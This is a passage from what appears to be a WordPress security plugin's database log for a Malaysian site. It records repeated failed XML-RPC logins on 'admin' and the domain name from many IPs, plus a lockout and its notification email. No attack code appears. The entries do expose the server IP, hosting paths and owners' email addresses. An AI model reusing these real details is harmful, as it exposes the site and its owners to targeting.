Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQsVRTEVi0fEJEHuDZFbAAAABE\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"110.4.46.11\";s:11:\"REMOTE_PORT\";s:5:\"52641\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQsVRTEVi0fEJEHuDZFbAAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846037.8386\";s:12:\"REQUEST_TIME\";s:10:\"1566846037\";}}','notice','2019-08-26 19:00:41','2019-08-26 19:00:38',18306696,19590544,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'110.4.46.11'),(23213,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"339\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQsghTEVi0fEJEHuDZFhQAAABg\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"115.84.182.60\";s:11:\"REMOTE_PORT\";s:5:\"61842\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQsghTEVi0fEJEHuDZFhQAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846082.6395\";s:12:\"REQUEST_TIME\";s:10:\"1566846082\";}}','notice','2019-08-26 19:01:25','2019-08-26 19:01:22',18306616,19592408,'http://bintara.com.my/blog/xmlrpc.php',1,0,'115.84.182.60'),(23214,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQs0hTEVi0fEJEHuDZFmQAAAAU\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"43.241.73.83\";s:11:\"REMOTE_PORT\";s:5:\"44734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQs0hTEVi0fEJEHuDZFmQAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846162.8898\";s:12:\"REQUEST_TIME\";s:10:\"1566846162\";}}','notice','2019-08-26 19:02:46','2019-08-26 19:02:43',18307784,19593704,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'43.241.73.83'),(23215,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQs8BTEVi0fEJEHuDZFpgAAABM\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.132.190.130\";s:11:\"REMOTE_PORT\";s:5:\"44930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQs8BTEVi0fEJEHuDZFpgAAABM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846192.6754\";s:12:\"REQUEST_TIME\";s:10:\"1566846192\";}}','notice','2019-08-26 19:03:15','2019-08-26 19:03:13',18302496,19503880,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'188.132.190.130'),(23280,0,'lockout','username-lockout::bintara.com.my','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:14:\"bintara.com.my\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-08-27 04:50:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-08-26 20:50:03\";s:14:\"lockout_expire\";s:19:\"2019-08-27 05:05:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-08-26 21:05:03\";s:16:\"lockout_username\";s:14:\"bintara.com.my\";}','action','2019-08-26 20:50:05','2019-08-26 20:50:03',18383432,19504248,'http://bintara.com.my/portal/xmlrpc.php',1,0,'74.220.215.118'),(23281,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-08-26 20:50:05','2019-08-26 20:50:03',18589984,19504248,'http://bintara.com.my/portal/xmlrpc.php',1,0,'74.220.215.118'),(23282,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/blogs/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/blogs/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/blogs/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF@2XkG1atThADMYGPrAAAANY\";s:12:\"REDIRECT_URL\";s:17:\"/blogs/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"154.0.168.90\";s:11:\"REMOTE_PORT\";s:5:\"33104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/blogs/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:17:\"/blogs/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF@2XkG1atThADMYGPrAAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852603.7366\";s:12:\"REQUEST_TIME\";s:10:\"1566852603\";}}','notice','2019-08-26 20:50:05','2019-08-26 20:50:04',18306664,19509128,'http://bintara.com.my/blogs/xmlrpc.php',1,0,'154.0.168.90'),(23279,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/portal/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF@x90bn5mtr-PXqq40AAAAFU\";s:12:\"REDIRECT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"74.220.215.118\";s:11:\"REMOTE_PORT\";s:5:\"56397\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF@x90bn5mtr-PXqq40AAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852603.5623\";s:12:\"REQUEST_TIME\";s:10:\"1566852603\";}}','notice','2019-08-26 20:50:05','2019-08-26 20:50:03',18302760,19504248,'http://bintara.com.my/portal/xmlrpc.php',1,0,'74.220.215.118'),(23278,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/beta/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/beta/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/beta/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF9xTEVi0fEJEHuDZacQAAAAU\";s:12:\"REDIRECT_URL\";s:16:\"/beta/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.116.16.173\";s:11:\"REMOTE_PORT\";s:5:\"57272\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/beta/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/beta/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF9xTEVi0fEJEHuDZacQAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852599.7476\";s:12:\"REQUEST_TIME\";s:10:\"1566852599\";}}','notice','2019-08-26 20:50:01','2019-08-26 20:50:00',18295488,19496552,'http://bintara.com.my/beta/xmlrpc.php',1,0,'103.116.16.173'),(23277,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp2/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/wp2/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp2/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF8g0@TGWC-1tzGX5fZgAAAI4\";s:12:\"REDIRECT_URL\";s:15:\"/wp2/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"69.89.31.84\";s:11:\"REMOTE_PORT\";s:5:\"37851\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/wp2/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/wp